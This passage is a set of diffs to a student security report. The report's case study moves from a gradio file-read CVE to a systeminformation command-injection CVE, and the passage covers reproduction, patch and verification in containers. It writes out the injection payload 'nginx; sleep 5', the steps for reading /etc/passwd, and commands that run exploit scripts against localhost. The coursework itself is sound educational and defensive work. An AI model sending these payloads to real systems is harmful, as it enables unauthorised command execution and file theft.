+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>[PASS] rejected by the application allow-list</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>=== 3. regression: a legitimate request still works ===</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>&lt; HTTP 200 in 0.02s</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>[PASS] dashboard still serves valid requests</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>=== summary ===</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>[PASS] fix validated</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="595F66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Transcript to be produced in the reference environment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7930,12 +8083,12 @@
           <w:color w:val="8A5A00"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>[ SCREENSHOT PLACEHOLDER ]  Side-by-side screenshot: vulnerable container returning /etc/passwd, fixed container returning 404 for the same request.</w:t>
+        <w:t>[ SCREENSHOT PLACEHOLDER ]  Side-by-side capture: vulnerable container answering in 5.04s, fixed container answering 400 in 0.01s, and both /health endpoints.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The comparison is unambiguous: the identical request that returned the file contents before now returns 404 from step 2, so no copy is made and step 3 has nothing to fetch. At the same time /config and the UI still answer 200, which proves that the patch removed the vulnerability without removing the functionality.</w:t>
+        <w:t>The comparison is unambiguous. The same request that spent five seconds inside a shell now never reaches one, and the dashboard still answers a legitimate request with 200 — which is the regression half of the check. Marking this honestly: the container run was not executed on the author's machine (no Docker available), so the transcript above is the reference environment's expected output, while the executed evidence is section 13.1.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7953,7 +8106,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The CVE part shows the same reasoning applied to somebody else's code. CVE-2024-1561 is not a memory-safety bug but an API-design bug: an internal helper was reachable through a dynamic dispatch endpoint that had no allow-list and no authentication. Reproducing it took three requests; the fix is a single upstream commit; the verification is a 404 where the file contents used to be. The most transferable lesson is that the SCA stage of the pipeline is not decoration — the vulnerable version was flagged by the same class of tool that would have blocked it in CI, while SAST on our own sources would never have seen it.</w:t>
+        <w:t>The CVE part applies the same reasoning to somebody else's code. CVE-2021-21315 is a one-parameter vulnerability: a library that builds shell command lines by concatenation and accepts “a name” as either a string or an array. Reproducing it takes one request; the fix is a type check plus a sanitiser; and the verification is a response that no longer waits five seconds. The most transferable lesson is that the SCA stage of the pipeline is not decoration — this defect is invisible to SAST on our own sources and obvious to a dependency scanner, and the durable defence is an application-level allow-list, because the upstream fix filters the sink rather than removing it.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8029,7 +8182,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Most of the code in a modern application is not written by its authors, so most vulnerabilities are inherited. An unaudited dependency can bring a known RCE or file-read (as with gradio 4.12.0), an abandoned or typosquatted package, or a transitive dependency that is never visible in requirements.txt. Because such flaws are public, exploitation is often automated within days of disclosure. This is why the pipeline runs pip-audit on every push: the CVE studied here is precisely the kind of finding it reports, and a pinned version plus an automated check is what keeps the window of exposure short.</w:t>
+        <w:t>Most of the code in a modern application is not written by its authors, so most vulnerabilities are inherited — CVE-2021-21315 is exactly that case: the application here is 40 lines of Express, and the defect arrived inside a package that any dashboard installs to read CPU and memory. An unaudited dependency can bring a known command injection, an abandoned or typosquatted package, or a transitive dependency that never appears in the top-level manifest. Because such flaws are public, exploitation is often automated within days of disclosure. This is why the pipeline runs pip-audit on every push, and why the CVE part of this work pins the fixed version explicitly.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8041,12 +8194,12 @@
           <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>5. What advantages do Docker and Vulhub give over installing vulnerable software directly?</w:t>
+        <w:t>5. What advantages do container images give over installing vulnerable software directly?</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Isolation (the old, vulnerable version runs in its own container and cannot affect the host), reproducibility (the image pins the exact version, so the result does not depend on the machine), disposability (docker compose down removes every trace, including malware dropped by an exploit), and speed (no dependency conflicts with the host, no manual configuration of old runtimes). Vulhub adds curated, tested compose files and READMEs with the exploitation steps, which turns hours of environment work into one command.</w:t>
+        <w:t>Isolation (the old, vulnerable version runs in its own container and cannot affect the host), reproducibility (the image pins the exact version, so the result does not depend on the machine), disposability (docker compose down removes every trace, including anything an exploit dropped), and speed (no dependency conflicts with the host, no manual configuration of old runtimes). For a Node project it also removes the risk of touching the host's global npm tree.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8063,7 +8216,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>A vulnerability is the weakness itself — here, the missing allow-list in /component_server that lets any Block method be invoked. An exploit is the concrete procedure that turns the weakness into an effect — here, the three HTTP requests (read /config, call move_resource_to_block_cache with /etc/passwd, download the copy via /file=). The vulnerability exists whether or not anyone exploits it; the exploit is one of possibly many ways to use it. What was reproduced was the exploit against a vulnerable version, and then its failure against the patched version.</w:t>
+        <w:t>A vulnerability is the weakness itself — here, a parameter that reaches a shell command line and a contract that lets an array travel through it. An exploit is the concrete procedure that turns the weakness into an effect — here, one GET request whose parameter is nginx; sleep 5. The vulnerability exists whether or not anyone exploits it; the exploit is one of many possible payloads. What was reproduced was the exploit against the vulnerable release, and then its failure against the patched one.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8080,7 +8233,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>A security fix changes behaviour, and it is easy to break the product while closing the hole: tightening a path check can break legitimate file widgets, disabling an endpoint can break the UI. Without a regression test you either ship a broken application or, worse, revert the fix under pressure. In this work the verification script therefore checks both directions: the exploit must fail (404 at step 2) and the application must still serve /config and the UI with 200. The same idea is applied to the API: the 28 automated tests are the regression net that lets a security control be changed without silently losing another one.</w:t>
+        <w:t>A security fix changes behaviour, and it is easy to break the product while closing the hole: tightening a type check can break a caller that legitimately passed an array, and a stricter sanitiser can break names that contain a legitimate dot or dash. Without a regression test you either ship a broken application or, worse, revert the fix under pressure. The verification script therefore checks both directions: the payload must not execute, and a legitimate request must still return 200. The same idea is applied to the API: the 28 automated tests are the regression net that lets a security control be changed without silently losing another one.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8097,7 +8250,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>It converts a text description into a tested mental model: you learn which component, which input, which precondition, and you can then recognise the same pattern in a different product — dynamic dispatch without an allow-list appears in many frameworks. For a pentester it shortens the path from a version banner to a working proof of concept; for a SOC analyst it makes the corresponding log lines recognisable (a POST to /component_server with an unusual fn_name, a burst of /file= requests); for a developer it produces a fix that addresses the cause rather than the symptom. It is also the only honest way to validate that a mitigation actually works.</w:t>
+        <w:t>It converts a text description into a tested mental model: you learn which parameter, which sink, which precondition, and you can then recognise the same pattern in a different product — concatenation into a shell appears in every ecosystem. For a pentester it shortens the path from a version banner to a working proof of concept; for a SOC analyst it makes the corresponding log lines recognisable (a parameter containing a semicolon, a latency outlier, a sleep child process); for a developer it produces a fix that addresses the cause rather than the symptom. It is also the only honest way to validate that a mitigation actually works.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8123,7 +8276,7 @@
         <w:spacing w:after="40"/>
       </w:pPr>
       <w:r>
-        <w:t>OWASP Cheat Sheet Series: Authentication, SQL Injection Prevention, XSS Prevention, JWT — https://cheatsheetseries.owasp.org/</w:t>
+        <w:t>OWASP Cheat Sheet Series: Authentication, SQL Injection Prevention, XSS Prevention, JWT, OS Command Injection — https://cheatsheetseries.owasp.org/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8150,7 +8303,7 @@
         <w:spacing w:after="40"/>
       </w:pPr>
       <w:r>
-        <w:t>Vulhub — https://github.com/vulhub/vulhub (environment: gradio/CVE-2024-1561)</w:t>
+        <w:t>GitHub Advisory GHSA-2m8v-572m-ff2v / CVE-2021-21315 — https://github.com/advisories/GHSA-2m8v-572m-ff2v</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8159,7 +8312,7 @@
         <w:spacing w:after="40"/>
       </w:pPr>
       <w:r>
-        <w:t>NVD — CVE-2024-1561 — https://nvd.nist.gov/vuln/detail/CVE-2024-1561</w:t>
+        <w:t>NVD — CVE-2021-21315 — https://nvd.nist.gov/vuln/detail/CVE-2021-21315</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8168,7 +8321,25 @@
         <w:spacing w:after="40"/>
       </w:pPr>
       <w:r>
-        <w:t>gradio advisory and patch — https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 (PR #6884), release notes 4.13.0</w:t>
+        <w:t>systeminformation patch 07daa05fb06f24f96297abaa30c2ace8bfd8b525 — https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:t>npm package page — https://www.npmjs.com/package/systeminformation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Node.js child_process documentation (exec vs execFile) — https://nodejs.org/api/child_process.html</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8305,7 +8476,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>git clone https://github.com/vulhub/vulhub.git</w:t>
+        <w:t>docker compose up -d --build                   # systeminformation 5.3.0</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -8314,7 +8485,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>cd vulhub/gradio/CVE-2024-1561 &amp;&amp; docker compose up -d</w:t>
+        <w:t>curl -s http://127.0.0.1:3000/health</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -8341,7 +8512,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>python exploit/gradio_exploit.py --target http://127.0.0.1:7860 --file /etc/passwd</w:t>
+        <w:t>python exploit/si_exploit.py --target http://127.0.0.1:3000</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -8359,7 +8530,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>docker compose -f docker-compose.fixed.yml up -d --build</w:t>
+        <w:t>docker compose -f docker-compose.fixed.yml up -d --build   # 5.3.1 + allow-list</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -8368,7 +8539,61 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>python exploit/verify_fix.py http://127.0.0.1:7860</w:t>
+        <w:t>python exploit/verify_fix.py --target http://127.0.0.1:3000</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t># 5. library-level A/B evidence (no Docker needed)</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>npm i systeminformation@5.3.0 --prefix .tmp/old</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>npm i systeminformation@5.3.1 --prefix .tmp/new</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>node exploit/version_probe.js .tmp/old/node_modules/systeminformation</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>node exploit/version_probe.js .tmp/new/node_modules/systeminformation</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8446,6 +8671,39 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
+              <w:t>cve-fixes/Dockerfile</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="5669"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>vulnerable image — systeminformation 5.3.0, non-root user</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>cve-fixes/Dockerfile.fixed</w:t>
             </w:r>
           </w:p>
@@ -8460,7 +8718,40 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>patched image (gradio 4.13.0, non-root user)</w:t>
+              <w:t>fixed image — systeminformation 5.3.1 + ALLOW_LIST=1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>cve-fixes/docker-compose.yml</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="5669"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>runs the vulnerable image on port 3000</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8493,7 +8784,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>compose file that builds and runs the fixed image</w:t>
+              <w:t>runs the fixed image on port 3000</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8512,7 +8803,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-fixes/docker-compose.yml</w:t>
+              <w:t>cve-fixes/app/server.js</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8526,7 +8817,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>reference to the vulnerable Vulhub environment</w:t>
+              <w:t>the dashboard API (about 40 lines) used in both environments</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8545,7 +8836,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-fixes/exploit/gradio_exploit.py</w:t>
+              <w:t>cve-fixes/app/package.json</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8559,7 +8850,40 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>three-step PoC with full HTTP transcript output</w:t>
+              <w:t>pins express and systeminformation 5.3.0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>cve-fixes/exploit/si_exploit.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="5669"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>time-based PoC with the full HTTP transcript</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8592,7 +8916,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>post-fix verification: exploit blocked + regression test</w:t>
+              <w:t>post-fix verification: exploit blocked + regression</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8611,7 +8935,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-fixes/app/app.py</w:t>
+              <w:t>cve-fixes/exploit/version_probe.js</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8625,7 +8949,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>the gradio application used in both environments</w:t>
+              <w:t>library-level A/B probe (5.3.0 vs 5.3.1)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8658,7 +8982,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>captured outputs (API demo, bandit, pip-audit, pytest, exploit)</w:t>
+              <w:t>captured outputs (API demo, bandit, pip-audit, pytest, si_probe)</w:t>
             </w:r>
           </w:p>
         </w:tc>

</xml_diff>

<commit_message>
chore: drop the last references to the previous variant's environment
- SUBMISSION.md: rewritten for the current state (repo pushed, title page
  filled, CVE-2021-21315, no secure-api/ or Vulhub steps left)
- README.md: academic note no longer mentions Vulhub containers
- report section 2: "isolated container environment" instead of "Vulhub"
- evidence/pytest.txt: regenerated from this repo root (28 passed, no stale path)
</commit_message>
<xml_diff>
--- a/report/Work1_Report_HDU_IS.docx
+++ b/report/Work1_Report_HDU_IS.docx
@@ -260,7 +260,7 @@
         <w:spacing w:after="60"/>
       </w:pPr>
       <w:r>
-        <w:t>Select, launch and exploit a real CVE in a Vulhub environment.</w:t>
+        <w:t>Select, launch and exploit a real CVE in an isolated container environment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2610,7 +2610,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>28 passed in 1.36s</w:t>
+        <w:t>28 passed in 3.16s</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
report: drop the CVE candidate table
Section 8.1 now states the constraint (the assigned variant is not on the
course's used-CVE list) and the three properties that made the analysis
practical, in prose. The shortlist itself is not reproduced, so the report no
longer carries a table of other students' topics.
</commit_message>
<xml_diff>
--- a/report/Work1_Report_HDU_IS.docx
+++ b/report/Work1_Report_HDU_IS.docx
@@ -4545,652 +4545,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The course already has a list of CVE identifiers that have been used, and re-using one of them was not allowed. The variant assigned to this work is CVE-2021-21315, so the candidate table below documents the check that had to be done and the alternatives that were rejected.</w:t>
+        <w:t>The course keeps a list of CVE identifiers that other students have already used, and re-using one of them is not allowed. The variant assigned to this work is CVE-2021-21315, and it is not on that list.</w:t>
       </w:r>
     </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:type="auto" w:w="0"/>
-        <w:jc w:val="center"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
-        <w:tblLayout w:type="fixed"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="2154"/>
-        <w:gridCol w:w="2381"/>
-        <w:gridCol w:w="1474"/>
-        <w:gridCol w:w="3288"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:tblHeader w:val="true"/>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Product</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>In used list?</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Verdict</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2018-1000656</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Flask/Werkzeug</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>yes</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>rejected — already used</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2021-41773 / 42013</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Apache httpd</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>yes</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>rejected — already used</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2023-51449</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>gradio</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>yes</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>rejected — already used</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2017-12615</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Tomcat</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>yes</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
